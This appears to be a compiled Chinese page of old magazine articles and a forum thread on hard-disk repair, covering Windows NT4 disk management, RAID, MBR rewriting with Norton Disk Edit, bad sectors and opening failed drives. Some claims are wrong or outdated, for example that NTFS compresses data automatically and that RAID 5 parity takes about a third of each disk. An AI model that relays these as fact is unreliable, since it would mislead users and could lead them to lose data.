   治疗方法：Fdisk无法读取硬盘分区损坏引起的，你可以分别按下面的几种方法来处理：

（1）从DOS运行Fdisk/mbr对分区进行修复。

（2）利用Norton Utilities 2000的DiskTools对硬件进行修复。

（3）利用Pqmagic(分区魔术师）对分区进行修复。Pqmagic有比Fdisk更强大的的修复成功，只要你启动它，它可以自动检查并修复一些分区已损坏的部分。


Windows NT4.0硬盘管理入门

《一键清理系统垃圾》

Windows NT4.0硬盘管理入门

      Windows NT4.0（以下简称NT4）是一个集应用、管理、网络服务与通信服务于一身的操作系统，对于硬盘的管理更加安全和可靠，本文从七个方面介绍了NT4下的硬盘管理。

    电脑中安装的每个硬盘称为物理硬盘，可以利用分区工具将每个物理硬盘最多分成四个区，其中包括一个主分区和若干个扩展分区，再经过格式化后就可以使用相应格式的硬盘了。DOS、WIN95和WIN98下的硬盘格式都是FAT（文件分配表）格式，而NT4下既可以使用FAT格式，还可以使用NT4所独有的NTFS（NT文件系统）格式，使得硬盘中的数据更加安全和可靠，NT4下硬盘管理的方法与其它操作系统相比，具有独特之处。

    一、新硬盘的安装

    NT4下可以同时使用多个大容量的硬盘，当然最好选用SCSI接口。安装步骤是:

    1.关闭电源，将硬盘装入计算机，配置好BIOS。

    2.启动NT，单击“开始”→“程序”→“管理工具”→“磁盘管理器”，进入“磁盘管理器”窗口，在该窗口中可以三种方式（磁盘配置方式、卷方式和属性方式）来显示硬盘的特性，其中物理硬盘以磁盘0、磁盘1等表示，逻辑硬盘以C:、D:等表示，未分区空间以斜线表示。

    二、硬盘分区的建立与删除

    在NT下，每个物理硬盘也只能分为四个区，其中一个为主分区，NT操作系统一般建立在主分区上。建立和删除分区的步骤是:

    1.打开“磁盘管理器”，选择菜单栏“磁盘分区”下的“创建”项。

    2.在随之打开的"创建逻辑驱动器"窗口中，输入分区的大小后确定即可。

    3.如是删除分区，则只要在“磁盘管理器”窗口中，选择菜单栏“磁盘分区”下的“删除”项即可。

    三、硬盘的格式化

    建立的分区必须经过格式化才能使用，其方法是:打开“磁盘管理器”，选择菜单栏“工具”下的“格式化”项，再根据需要选择FAT格式或NTFS格式即可。这两种格式的主要区别是:

    1.FAT格式的文件名为8.3格式，而NTFS格式的文件名可达到255个字符。

    2.FAT格式的目录结构无序，而NTFS格式的目录结构使用B-tree,能快速查找。

    3.FAT格式下的数据无压缩，而NTFS格式下的数据系统自动进行压缩。

    4.FAT格式的分区可为DOS、WIN95、WIN98和NT4所共用，而NTFS格式的分区却只能被NT4所使用，DOS、WIN95和WIN98无法在NTFS格式的分区上读写信息。

    四、卷集的创建

    卷集是NT4对硬盘分区的一种新方法，它将多个硬盘中分散的未分配空间合成一个独立的大分区。如果用户需要一个很大的逻辑盘，但却只有两个较小的物理硬盘时，使用创建卷集的方法就可以将这两个小硬盘设置为一个大硬盘了。创建卷集的步骤是:

    1.打开“磁盘管理器”。

    2.按住Ctrl键，单击各零散空间。

    3.选择“磁盘分区”菜单下的“创建卷集”项。

    4.输入卷集的大小后确定。

    五、带区集的建立

    NT4下可以使用带区集将两个硬盘设置为一个大逻辑硬盘，从而使系统读写的信息平均分为两部分，分别向两个硬盘同时传送。由于信息分别存放在两个硬盘上，所以若有一个硬盘损坏的话，整个带区集都无法恢复。创建带区集的步骤是:

    1.打开“磁盘管理器”。

    2.按住Ctrl健，单击两个硬盘的可用空间。

    3.选择“磁盘分区”菜单下的“创建带区集”。

    4.输入带区集的大小后确定，注意该值不能大于较小硬盘可用空间的2倍。

    六、具有校验功能带区集的建立

    为避免因硬盘损坏而造成的不安全因素，在NT4下可以创建具有校验功能的带区集，它要求有三个以上的硬盘，以备一个硬盘损坏后可以及时恢复保存的信息，这也称为是NT4的RAID（廉价磁盘冗余阵列）功能。创建具有校验功能的带区集步骤是:

    1.打开“磁盘驱动器”。

    2.按住Ctrl键，单击数个硬盘的可用空间。

    3.选择“容错”菜单栏下“创建带奇偶校验的带区集”。

    4.输入带区集的大小后确定。

    七、磁盘共享权限的设定

    在NT4下，可以将整个硬盘设置为共享，供其它的计算机或用户使用。步骤是:

    1.打开“磁盘驱动器”。

    2.选择属性显示方式。

    3.选择“共享”标签。

    4.输入“共享名”。

    5.同时还可以设定能够共享硬盘的用户。

    综上所述，NT4对硬盘的使用提供了非常安全、可靠的管理方法，给电脑用户带来了极大的方便。

返回


Windows NT的硬盘管理特点

《一键清理系统垃圾》

Windows NT的硬盘管理特点

     1.Windows NT提供的RAID功能
     所谓RAID就是磁盘冗余阵列（Redundant Arrays of Inexpensive Disk，RAID），它是用于提高硬盘系统容错能力与效率的一种廉价措施，根据系统所提供的硬盘读取和写入能力以及数据存储安全性的不同，RAID可分为6个级别，即是RAID 0、RAID 1、RAID 0+1、RAID 3、RAID 4和RAID 5，较常使用，同时也是Windows NT所支持的有以下三种：
     ●RAID 0:带区集。在Windows NT中，可以从多个（最多32个）硬盘中各取一个相同容量的磁盘空间，组成一个独立的集合，并赋予一个驱动器代号，这个具有同一代号的硬盘空间集合称为带区集。当写入数据时，数据先被分割成大小为64KB的数据块，然后并行写入到带区集中的每个磁盘中。系统读取磁盘数据时，将同时从各个磁盘并行发送读取数据块，经自动整合后形成一个完整的数据。RAID 0的最大优势是通过快速读取和写入，提高了硬盘的读写性能。但当带区集中的任何一个硬盘或分区损坏时，将造成所有数据的丢失。
     ●RAID 1:即通常所讲的磁盘镜像。它是在一个硬盘控制卡上安装两块硬盘。操作中，一个设置为主盘（Master），另一个设置为镜像盘或者从盘（Slaver）。当系统写入数据时，会分别存入两个硬盘中，两个硬盘中保存有完全相同的数据。一旦一个硬盘损坏，另一个硬盘会继续工作。RAID 1具有很好的容错能力，但是当硬盘控制卡受到损坏时，数据将无法读取。为了克服一个硬盘控制卡管理两个硬盘时存在的安全问题，可将两个硬盘分别安装在不同的硬盘控制卡上，如果一块硬盘控制卡损坏时，另一块硬盘控制卡还会继续工作，从而提高了系统的容错能力，这种组合方式又叫做磁盘双工。在Windows NT中，磁盘镜像和双工只是在硬盘安装时有所不同，而软件的设置方法基本一致。
     ●RAID 5:带奇偶校验的带区集。它是在RAID 0的基础上增加了对写入数据的安全恢复功能。数据块仍分散存放在带区集的所有硬盘中，同时每个硬盘都有一个固定区域（约有所使用硬盘分区的1/3）来存放一个奇偶校验数据。当任何一个硬盘失效时，可利用此奇偶校验数据推算出故障盘中的数据来，并且这个恢复操作在不停机的状态下由系统自动完成。RAID 5在使整个硬盘的读取和写入性能得到明显改善的同时，还具有非常好的容错能力，但硬盘空间无法全部用来保存正常数据。
     2.卷集的作用及特点
     卷集是Windows NT环境下用于管理硬盘的一个非常有效的方式。当一台机器中安装多个硬盘时，一般情况下不同硬盘或同一硬盘的不同分区是相互独立的，当写入数据时，如果一个硬盘或分区已满，系统不会将待写数据自动存入下一个硬盘或分区中。但是使用卷集时，可将一个或多个（最多为32个）硬盘中的多个可用硬盘空间组合起来，形成一个单元，并给予一个驱动器名。当数据保存到卷集中的硬盘空间时，先存放到第一个硬盘或分区中，待存满后，紧接着再自动存放到第二个可用的硬盘或分区空间，依次类推。卷集最大的优势是可以将多个较小容量的硬盘空间合并起来，甚至可以将多个硬盘合并成一个硬盘来使用，提高了磁盘的可利用率，并有利于一些大型软件的安装和运行。但是，当卷集中的一个硬盘发生故障时，卷集中的所有数据将会丢失。因此，卷集既不能提高硬盘的读取和写入性能，也不具备系统容错功能。

返回


报废硬盘维修实录

《一键清理系统垃圾》

报废硬盘维修实录

    前几贴关于硬盘维修的贴子得到了大家的热情回信，网友把压在箱底的坏硬盘都往我这里发我这都快成坏硬盘回收站了，网友来信最多问的，就是认不出，启不来的盘，还能修吗！低格无效的盘还能修吗，本人始终想弄清楚这些硬盘究竟坏在什么地方？能否自行修复！于是对这些硬盘逐一进行拆卸、清洁、对换元件或用软件处理。结果出乎我的预料：15只
西捷、昆腾硬盘经过以上处理后，竟有12只恢复使用，只有3只彻底死亡。

    微机对硬盘自检的故障提示一般有两种：一种是“HDD Not Detected(没有检测到硬盘)”，另一种是“HDD Control Error(硬盘控制错误)”。现介绍具体的修复步骤。

    先用水洗净双手，目的是洗净手上的油迹与汗迹，同时泄放掉人体可能残存的静电。最好能戴一双医用手套再进行操作。本人的15只硬盘在自检时均能听到磁盘旋转的声音。磁盘能正常旋转，估计主电机和控制电路板均无故障。对于“HDD Not Detected”错误提示的硬盘，首先检查硬盘外部数据信号线的接口是否有变形，接口焊点是否存在虚焊。排除以上的可能后，取下硬盘后盖，露出电路控制板。拧下控制板上的固定螺丝，将控制板与硬盘主体分离。这时可以看见硬盘主体的两排弹簧片。一排作为主电机的电源，另一排作为硬盘主体的磁头机械臂驱动线圈电源以及硬盘主体与电路控制板间数据传输接口。对于无特殊封装的硬盘，往往可以看见弹簧片与控制电路板对应部位均有灰尘。用脱脂棉蘸无水酒精清洁，对弹簧片变形的部位校形，并除去氧化层。本人的7只硬盘经以上处理后，均恢复正常。

    如果以上处理无效，那就得打开硬盘主体。选取一个灰尘很少的环境，拧开硬盘前盖的螺丝(有的是用胶粘牢)。取下硬盘的前盖，这时就可清楚地看到盘面。首先用数字万用表检测磁头机械臂驱动线圈是否断路。该线圈的正常阻值为20Ω左右。其次检测磁头上的连线是否断开。每张盘面的两侧均有一个磁头，每个磁头均有两根连线接到磁头机械臂上的集成芯片上。该芯片常见的型号为H1710Q，作用是将磁信号转变为电信号，再送到电路控制板处理。磁头阻值应在23Ω～26Ω之间。若磁头阻值较大，说明磁头损坏。磁头连线与芯片H1710Q相连，H1710Q对应脚阻值应在1.7kΩ左右，若在1.2kΩ以下说明该芯片已被击穿，可与排线一起更换。

    若磁头上的连线断路，可用∮0.2mm的优质漆包线取代。一端压在磁头的金属弹片上，另一端焊在H1710Q相应的脚上。注意将漆包线卡在机械臂相应的卡槽内，并用少许502胶水固定，防止硬盘转动时与漆包线相摩擦。将硬盘各部分复原后，最后用702硅胶将硬盘周围封死，防止灰尘进入。由于磁头体积很小，不易将漆包线卡在上面，最好在放大镜下操作。在本人的废硬盘中，有两只系磁头上的连线损坏。本人在卡漆包线时由于用力过猛，造成一只磁头损坏，因此只修复好一只硬盘，开机后恢复正常。

    对于提示“HDD Controller Error”错误的硬盘，大都是由于某种原因造成硬盘主引导记录(MBR)上文件受损。MBR位于0磁头／0柱面／1扇区上，由FDISK.EXE对硬盘分区时生成。若MBR受损，微机会提示HDD Controller Error，实际上是零磁道上文件损坏，这时格式化是解决不了问题的，必须用专用软件来处理。首先用系统盘在A盘启动后，运行Scandisk命令检查C盘。

    若零磁道未损坏，只需用Norton8.0软件将该磁道上的文件修复即可。具体作法为：找一台内置硬盘与待修硬盘型号规格完全相同且装有Norton8.0版软件的电脑，将待修硬盘与硬盘电源线相连接，但硬盘信号线不接，跳线不变。1)开机后运行Disk Edit命令，从菜单Tools中点取CONFIGURATION项，将Read Only项取消，2)从下拉菜单O-biect中选取Driver项，将Hard Disk类型设置为Physical Disk，点击OK项确定；3)从Ob-ject菜单中选取Partition Table项，将接在完好硬盘上的信号线拔下，接到待修硬盘上，点击OK项确定。4)选择Hard Disk1点击OK项确定，再从Write Ob-ject to Physical Sectors对话框中将Cylinder、Side、Sector分别设置成0、0、1点击OK项确定。当出现Warning对话框时选Yes项。退出Norton软件，这样就将硬盘的主引导信息恢复。重新启动，硬盘恢复正常，原硬盘内的文件也不会丢失。

    若零磁道损坏的硬盘，先仍按上述步骤用Nor-ton8.0软件处理，只是到了第三步时，将Cylinder、Side、Sector分别设置成1、0、1点击OK项确定。当出现Warning对话框时选Yes项。退出Norton软件，重新启动计算机，在CMOS设置硬盘自动检测一栏中可以看到，CYLS数值减少了1个。如原来CYLS为2112，则变为2111。说明原硬盘分区表是从C盘的0柱面开始，现从1柱面开始。保存CMOS设置后退出。重新分区、格式化后硬盘恢复正常。另有3块硬盘，自检时提示“HDD Controller Er-ror”。采用以上方法处理无效，只能报废。同行们手中若有坏硬盘，先不必废弃，可先按以上的方法维修，相信会有意想不到的收获。


避免硬盘崩溃困扰的秘诀

《一键清理系统垃圾》

避免硬盘崩溃困扰的秘诀

   为预防硬盘（HDD）崩溃而将个人电脑中的数据进行备份已经成为一种常识。尽管如此，实际上采取这一理所当然的措施的人却少得令人吃惊。但令人欣慰的是“备份=麻烦”已经成为过去。下面就介绍一种《日经WinPC》推荐的巧妙而有效的硬盘备份方法。
   用户常常会碰到丢失重要数据文件或Windows无法启动等系统方面的重大故障，原因五花八门。其中硬盘崩溃是最为典型的一种情况。硬盘即使只受到轻微的撞击也有可能会引起磁头接触盘面或传动轴的轴承损伤。这些情况日积月累，直到有一天硬盘会突然读不出数据。更为糟糕的是，总是在硬盘崩溃的一瞬间，用户才发现没有采取备份措施。
   如果说硬盘崩溃的直接原因是硬盘故障的话，那么系统崩溃的罪魁祸首就是软件的不匹配。用户可能都有这样的经验：在升级驱动软件时，一直运行良好的个人电脑突然变得不稳定起来。最糟糕的情况是OS无法启动。最近则必须时刻提防来自计算机病毒的威胁。
   崩溃发生的原因不全在别人，用户自己损坏数据的事情也时有发生。比如处理数码相机拍摄的照片时，有的用户会以相同的名字覆盖掉原始文件等等，这样的例子比比皆是。而且就连搞错格式化对象这样令人难以置信的错误也时有发生。
   硬盘备份--仅仅原封不动地完全保存仍存在风险
   为防止数据和系统免受上述形形色色的崩溃原因的侵害，唯一的办法就是将硬盘的内容全部备份。那么，到底该怎样进行备份呢？
   最常见的做法是采用另外一个硬盘来进行硬盘备份。因为速度最快、容量最大、单位容量的价格最便宜的就是硬盘。用户厌恶备份的首要原因是嫌耗时太多。而硬盘备份速度快，即使拷贝大量的文件也勿需等待太久。由于专用保存设备过于昂贵，所以还是立足于硬盘备份，因为1万日元就可以买到容量十分可观的硬盘。
   因此，硬盘备份时将所有的内容都原封不动地拷贝到备份专用硬盘中是最为简单而可靠的做法。一旦全部拷贝后，只需对更新文件进行备份即可，所需时间极短。而且还有懒惰一点的用户干脆用镜像的办法在2台硬盘上保存相同的内容。
   那么，这么做就无可挑剔了吗？问题并不这么简单。就拿刚才举出的崩溃原因来说，这种备份方法可能导致病毒侵害、软件故障和用户失误而引起的数据损坏无法恢复。比如，一不小心将一份重要的文件覆盖了，然后又进行了备份，这种情况下岂有办法恢复？
   为了防止类似事件的发生，在硬盘完全备份之外，仅将数据文件保存到大容量的可拆卸介质上不失为一种有效的手段。
   而且仅靠双硬盘也无法抵御Windows崩溃和病毒侵害的威胁。因为这种威胁很有可能同时波及到两个硬盘。这时候就轮到自己制作恢复CD这种方法发挥作用了。预先通过CD-R制作一张将稳定状态下的系统完全备份的恢复CD即可。不过，这种方法无法挽救恢复CD制作完成后更新的数据文件。因此数据还需要专门保存在其它的移动硬盘中。
   要想安全还得费一番功夫--系统和数据应分开备份
   前面的介绍或许显得有些零乱，所以下面就归纳一下。
   简而言之，避免硬盘崩溃困扰的成功密诀就是：
   ①能够简单而且迅速地完成
   ②必须每日进行
   ③系统与数据应分开保存
   其中①对于用户顺利地进行备份是必不可少的。为此硬盘备份是最简单的方法。②的意义不言自明。谁也不知道崩溃会在什么时间发生。即使今天不会有，也不能保证明天你还能如同往常一样将个人电脑启动起来。 而③则将对节约系统的恢复时间及简化恢复过程起作用。尽管也有人认为由于只需将OS和应用程序再装一遍即可恢复如初，所以只用进行数据备份，但不能说这是一种切合实际的想法。因为OS的安装要花费很长的时间，各种各样的应用程序的配置和重新设定耗时更多。如果再考虑上软件的补丁和驱动程序的升级问题，简直令人窒息。为了免去这些麻烦，绝对有必要事先准备好恢复CD，以便随时可以重新恢复到原来的系统环境。


常见硬盘自举失败的分析

《一键清理系统垃圾》

常见硬盘自举失败的分析

    一般硬盘自举失败，如果不是主引导扇区或DOS引导扇区被破坏（如被病毒感染），那么其他症状基本上是由一些与硬盘相关的硬件故障引起的。软件方面可用杀毒软件查杀引导扇区病毒，或用NORTON、DEBUG等修复（比较麻烦），而硬件方面可根据开机自检后所提示的信息来进行分析。
    1.开机自检完成并提示以下出错信息：HDD controller failure Press F1 to Resume
    当出现上述信息时，则应该重点检查与硬盘有关的电源线、数据线的接口有无松动、接触不良、信号线接反等，其次还要检查硬盘的跳线是否设置错误。
    2.开机内存自检后显示如下信息：FDD contreller fanilure HDD contreller failure Press any key to Resume
    出现上述信息通常是连接软、硬盘的I/O部分接触不良或有损坏，这个比较麻烦，轻的还可修理，严重的搞不好就得换件了。
    3.开机显示如下信息：Drive not ready error Insert Boot Diskette in A Press any key when ready...
    出现上述错误，多属于“C:”类型未设置或因为CMOS供电不足，造成CMOS信息丢失所引起。
    以上只是些常见的硬盘自举失败的原因。如果是第1、3类，可以自己手动排除，若是2类的问题，自己就不好下手了，最好还是到厂家或是请专业人员来维修吧。

作者：王琦
来源：电脑报


从死神手中抢回宝贵的硬盘数据

《一键清理系统垃圾》

从死神手中抢回宝贵的硬盘数据

    事故起源于一次停电，我当时正在整理硬盘，由于停电在大学校园里经常发生，我已经见惯不惊，也没有怎么特别在意。恢复供电后启动电脑，可是系统却显示没有系统盘，提示插入启动盘。我习惯性地拿出win98启动盘启动了系统，认为不过又是一次简单的系统文件损坏，可以轻松搞定。可是事情出乎了我的意料。系统启动后键入“C：”，系统提示符显示当前目录已经在C盘根区，可是当我试图列出目录结构时DOS报错。运行Scandisk，报告可能是BIOS设置错误或者有病毒，退出。整个c盘看上去好象没有被格式化过，不能执行任何操作。还有更糟的，其余分区竟然全部一起丢失！Fdisk也只能显示C盘及其容量（和出事前同样大小--这一点很很重要，下文将会提到），其余分区连同其硬盘容量都全找不到了。联想到最近某篇文章介绍到突然停电可能造成BIOS的硬盘设置出错，我还不慌不忙地重起电脑进入BIOS中设置硬盘，可是并没有发现任何错误！问题比想象的严重得多。这时候我有点病急乱投医了，急忙找出能找到的关于硬盘故障的文章来参考，我甚至怀疑是中了病毒或者硬盘锁，可是从现象来看并不是十分吻合，并且由于有重要数据保存在硬盘，平时使用中我很注意严防病毒，基本可以排除这方面的问题。手中没有任何资料提到这种问题，看来我的问题还很独特，“史无前例”呀。现在只有自力更生，靠自己的力量来挽救我的宝贵资料了。

    凑巧的是我桌上正好有一张Norton2002的光盘（说起来可能有很多老鸟在DOS时代就已经接触过Symantec公司的Norton8.0了，从那时起Norton系列软件就帮助我们解决了无数的电脑软硬件问题，可以说最专业的系统诊断维护软件它是当仁不让了），何不试一试它能不能帮我再一次度过难关？

    说干就干，拆下我的硬盘装在舍友电脑上并正确设置。启动Win98安装好Norton2002，迫不及待地运行Norton disk doctor扫描硬盘(Norton组件支持FAT16、FAT32、NTFS这些使用最多的分区格式），马上NDD就发现硬盘分区错误和一些很专业的“莫名其妙”看不懂的错误，接下来当然是修复这些可恶的问题啦。重起后惊奇地发现C盘的文件已经完全恢复，一个比特也没有少，初战告捷。

    可是如何恢复其余分区里的资料？我有一点不知所措了，不过现在可以肯定地判断不是病毒和硬盘锁的原因，真亏了当时没有乱下药呀。回想NDD检测硬盘时不止修复了一处错误，说不定现在已经找回了丢失的容量。想到这里我键入了“Fdisk”，呵呵，果然不出我所料，丢失的硬盘容量全找出来了。接下来是重新分区然后格式化？没有那么简单，要是那样我的资料可能就进入天堂再也找不回来了，多日辛苦搜集的东西怎能说放弃就放弃？C盘不是已经恢复了么？我何不“克隆”出几个“一模一样的C盘”来让NDD给我恢复硬盘？使用Fdisk给剩余的硬盘分区（由于有一定的冒险因素，我的手有一点抖），要注意的是，新分的分区一定要和原来的分区完全相同，如果您记不住的话也许就只有放弃了。分好区后重起进入Win98运行NDD检测分区（千万不要格式化分区），和当时C盘一样，NDD发现了错误并成功修复，所有分区里的资料全部找回，让人不由地狂喜。

    问题的解决全靠了Norton，让我不由地再一次对它刮目相看。不用掌握高深的知识，不用烦琐的操作，Norton可以给您的系统以最专业的维护，当您的系统出现了各种莫名的错误时，借助Norotn说不定就可以达到事半功倍的效果。朋友，试试看？


低格能否消除硬盘坏道

《一键清理系统垃圾》

低格能否消除硬盘坏道

    甲：大家来说说硬盘出了坏道应该怎么处理？听说用低级格式化就可以解决问题，使硬盘重获“新生”？是这么回事吗？

    乙：低级格式化应该不能彻底消除硬盘的坏道。简单地说，目前的低级格式化程序只会屏蔽硬盘的物理坏道，而并不能修复坏道。硬盘经过“低格”处理后，坏道是有可能看不见了，但那只是将坏道隐藏起来。而且如果下次再出现坏道又做一次“低格”，如此恶性循环，坏道只会越来越多！虽然表面上没有了，但被屏蔽的扇区越来越多，硬盘上的可用空间也就会越来越少！等真正醒悟过来时，可能已经超出了质保期限，悔之晚矣！还是不提倡这种作法为妙。

    丙：可是大部分的坏道都只是逻辑性的，“低格”完全可以修复，而修复后也可以正常使用，我就用过这样的硬盘。

    乙：逻辑坏道需要用“低格”来修复？

    丙：当然了！那是最直接的方法，用其他软件也可以！

    乙：可是你知不知道当Lformat程序发现有物理坏道时，就会提示错误而退出，根本不可能完成修复工作！再说，既然确定是逻辑坏道，那用NDD就可以了，用LFormat简直是“饮鸩止渴”！

    丁：LFormat真的很有用吗？答案是否定的！那只是权益之计，它也许可以使硬盘勉强使用，但并不会有什么彻底的修复之论，况且只是个别情况！再说现在厂商一般都提供3年的保修期，所以如果在保修期内的话最好还是送回厂商做更换或维修的好。

    乙：我个人认为，低格程序是为厂商设计的，而非一般用户。有很多人看到自己的硬盘有坏道就想用“低格”来修复，在理论上来看是可能的，但硬盘坏道的性质到底是什么在起着决定作用？如果是物理损伤，用100次“低格”也没有用，因为硬盘可不是什么“泥土块”，有了裂痕再把它揉揉就好了。所以“低格”前一定要把坏道的性质分清楚，如果盲目的使用低格程序，只会适得其反。

    再有，低格程序会把原有的分区全部删除，而坏道还是存在，等到再次分区时就可能把原来的坏道分成两个或几个。虽然可能一时看不出，系统也暂时检测不出，但坏道是会扩大的，像传染病一样蔓延，如果有重要的资料存储在暂时还没有问题的扇区上，那一旦发作就惨了！从我个人经验来看，有物理坏道的硬盘没做低格的，坏道蔓延速度要比做低格的慢，而且即使扩散也只在坏道的邻近扇区，但用了低格后可能就要“满地开花”了！

    而且我记得不少厂家也都告诫用户慎用“低格”！恐怕用意也正是在此。

    丁：其实还是应该先分清坏道的类型，确认到底是逻辑坏道还是物理坏道。

    乙：如果一定要用Lformat来“修复”坏道的话，也应该先知道什么是Servo、什么是ECC、什么是Preamp、什么是PRML？而且作为普通用户也应该知道，现在的硬盘没有任何第三方的程序能做真正意义上的“低级格式化”。

    丙：你们说了半天我还是不清楚什么叫物理坏道、什么叫逻辑坏道，是不是说软件能修复的就是逻辑坏道，不能修复的就是物理坏道？那Scandisk等软件所报告的“物理坏道”指的只是对硬盘执行写指令时硬盘返回操作系统一个错误；而逻辑坏道，指的是在FAT表上标记为坏道，但是这个FAT表所对应的位置却能够正常读写。是这么回事吗？

    乙：我所指的逻辑坏道是说硬盘在写入时受到意外干扰，造成有ECC错误。硬盘在写入的时候，是会用ECC的逻辑重新组合数据，一般操作系统要写入512个字节，但是实际上硬盘会多写几十个字节进去，而且所有的这些字节都要用ECC 的方式进行编码。如果根据原始字节算出的 ECC和读出字节算出的ECC不同，就会产生ECC错误，但是这个时候数据一般能够读出来。

    而物理坏道是指磁盘的介质损伤或者是各种原因造成的对某个区域的无法读写。

    丁：物理坏道其实也有软性和硬性的分别。介质表面的物理损伤是硬性的，且无法修复。但由于某些外界影响而造成的数据写入的几个bit错误，一般的操作系统也会认为是物理坏道，但这种坏道是能够用硬盘自己的逻辑或厂方提供的软件修改好的，虽然一般的格式化或所谓的“低格”程序都会在这些位置报告错误，但这种ECC错误是能够用相应的指令和逻辑改正且回写正确的。

    再有，即使硬盘有了个别细小的表面物理损伤，目前的硬盘也能够通过将这个扇区重新定向到一个好的保留扇区里面来修正，像WD硬盘的数据卫士就是干这个工作的。

    其实所有的硬盘都有一个内部的“表”，在这“表”里是一些物理地址(通过Servo逻辑来定位，用真实的物理磁道表示法来表示偏移)，这些位置是表示在这些地方写入数据可能不稳定，或者有小的缺陷，而这个“表”就叫做P-List。

    而操作系统的格式化指令，一般是调用ATA的写扇区或格式化扇区指令，这两个指令是无法完成诸如改正ECC错误，或者扇区重定向工作的。所以，一般的格式化或硬盘修正软件是不能修改这种能够修改的错误的……

    丙：有一个问题请教：是不是目前真正的“低格”已经不是最终用户可以做的，因为由于逻辑寻址的关系，最终用户所用的程序都不可能进行原始意义上的“低格”，从某种意义上说只是比原来“低格”更为高级一些的硬盘逻辑重置的操作。因此我觉得现在大谈特谈“低格”并没有太大意义，目前一些硬盘公司也都提供了Zero-Fill（充零，用0字符填满整个硬盘）工具，表面效果其实与“低格”差不多，不知您的看法如何？

    另外，现在很多硬盘都会自己Defect List，这是不是您所说的P-List？同时，这是否也意味着这些硬盘也都具备了扇区重定向技术？

    丁：现在的硬盘都有这种“重定向”技术，这个技术说简单点就是把真实的CSH映射到一个虚拟的CSH上的“表”。大家对于只有一个磁头的硬盘在设置里有16个磁头应该已经习惯了，而这些东西确实都在一个保留的分区，而且也是可以通过一般的ATA 接口来访问的。

    不过，如果要进入这个保留分区的话，硬盘首先要进入非正常使用的状态(我们叫Native方式)，而且还要知道各个“表”的偏移量，以及“表”的数据结构。因此，这对于一个可能有几十兆，但却不知道数据结构和“表”的起始、结束位置的大块数据来说，用户即使知道了也无法使用，就更不用说修改了。（飞翔鸟2000收集、整理）

    本期小结：本期话题是围绕一个朋友对“低格”程序是否可以修复硬盘来展开的。关于“低格”问题，大家的意见主要是：如果是磁盘有物理损坏，除非更换是无法完全解决的；如果是非物理损坏这里就要看是怎么回事了，有的是普通用户可以解决的，比如用Format或文中说的LFormat等；但另有一些软性问题却只有厂商才有相关的工具可以解决。


电极氧化引起的硬盘故障

《一键清理系统垃圾》

电极氧化引起的硬盘故障

《中国电脑教育报》钟元刚

    笔者有台计算机，赛扬333MHz CPU、64MB内存、希捷3.2GB硬盘。从1998年至前不久，一直运行良好。但最近出了点问题，故障现象为经常无故死机，有时刚启动后马上就死机，有时运行时间长一点，总之毫无规律可循。

    开始以为是病毒在作怪，用最新版的KV3000查杀病毒，结果一无所获。接着采取替换法，把主板、显卡、声卡、内存、CPU等可疑硬件统统换掉，结果故障被确定在硬盘上，但它可陪伴我好几年了，有不少重要的数据，真是舍不得让它“下岗”，况且又不是完全损坏，在BIOS中显示的硬盘参数正常，而且也可以正常安装系统，复制文件，硬盘电路板上也没有发热过高的元器件，真是看不出哪里有损坏！怎么办？好在笔者经常拆卸一些硬件，于是决定将电路板拆下来试试。

    准备好工具，用螺丝刀把硬盘底部的两根螺丝拧下来，把保护板拿下来，便露出了硬盘的驱动电路板。以笔者的无线电经验，用观察法、测量法都没有发现异常。但是大家知道，集成度很高的电器都是用双面电路板和使用大量的贴片元件的，硬盘也不例外。于是又把硬盘的驱动电路板卸下来，在检查的过程中终于发现了问题所在，这块希捷3.2GB硬盘和现在的大多数硬盘一样，电路板和电机、磁头之间的连接不是用排线，而是在反面使用弹簧片电极，利用电路板的压力进行连接，从而完成电机转动、控制磁头寻道、传输数据等一系列工作。问题就出在电路板和电机、磁头之间接触不良！仔细观察电路板和电机、磁头的接触部分，隐约看见有黑乎乎的东西，看来是电极被氧化了。

    问题找到了，解决起来就很简单啦，用医用棉球蘸无水酒精反复擦洗硬盘电路板触点及电极部分，直到干净、露出金属光泽为止。然后按照相反的步骤装好硬盘，试机，一切正常。到目前为止，该硬盘已经稳定工作三个多月了，特写出来，与广大爱好者交流。

    由于硬盘工作在恶劣的环境中，而且使用时间较长，因此容易受到水气的侵蚀，导致硬盘内电极氧化而引起这一特殊故障。希望大家在拆卸、清洗硬盘电路板的时候千万要小心，否则你的硬盘很可能就报废了！


电脑自检找不到硬盘

《一键清理系统垃圾》

电脑自检找不到硬盘

各位高手！我自己攒的一台电脑，开机后突然发现找不到硬盘了，无法进入系统，打开机箱发现硬盘不转，把硬盘拆下换到好的电脑上可以找到硬盘，使用没有任何问题，然后更换一根好的数据线，还是不转，请大家指点一下，如何才能修好？谢谢
开机进入BIOS也找不到硬盘

[ 本帖最后由 yuehao1979 于 2006-6-28 16:52 编辑 ]
--------------------------------------------------------------------------------
作者: 蜘蛛网管　　时间: 2006-6-28 17:04

那就是　主板的IDE 接口 坏了

两个接口多不可以的话　就去换主板吧
--------------------------------------------------------------------------------
作者: 罗马王子托蒂　　时间: 2006-6-28 17:33

你的机子有还原卡吗？要是有的话可能就是还原卡的问题，你检查一下还原卡是不是插好了啊
--------------------------------------------------------------------------------
作者: yuehao1979　　时间: 2006-6-28 19:34

我没有还原卡！我只剩下电源线没检测了！千万不要是主板的问题啊
--------------------------------------------------------------------------------
作者: dyp16888　　时间: 2006-6-28 20:43

是不是电源的质量不好,功率不够啊
--------------------------------------------------------------------------------
作者: 0o-o0　　时间: 2006-6-28 22:30

兼容性问题、电源问题、主板接口问题
--------------------------------------------------------------------------------
作者: 缘份的天空123　　时间: 2006-6-29 09:30

可能是电脑的兼容性问题！~！~
--------------------------------------------------------------------------------
作者: 暗夜邪舞　　时间: 2006-6-29 11:15

木听说过不兼容硬盘的，顶多少个几十G。

看COMS里IDE是否开启。
--------------------------------------------------------------------------------
作者: 非洲小白脸　　时间: 2006-6-29 12:43

看看你的硬盘数据线是否坏了
--------------------------------------------------------------------------------
作者: yuehao1979　　时间: 2006-6-29 12:56

问题解决了！竟然是和光驱有冲突，真不明白，把光驱的口拔下就可以进入系统了！我改了一下跳线，还好现在没有问题了，谢谢大家的帮助，多谢
--------------------------------------------------------------------------------
作者: wangdasheng　　时间: 2006-6-29 13:00

1.首先你確定你的硬盤的電源有沒有問題。開機,用手摸硬盤來判斷.
如果是排除硬盤和排線問題了，剩下只有主板問題了,
主板的話哪就是一大串東西了，
首先要目檢你的主板有沒有暴電解電容和燒零件（目檢主板）,
這是必須的步驟.現在的主板一般都是直接聯接南橋。哪就是麻煩了。
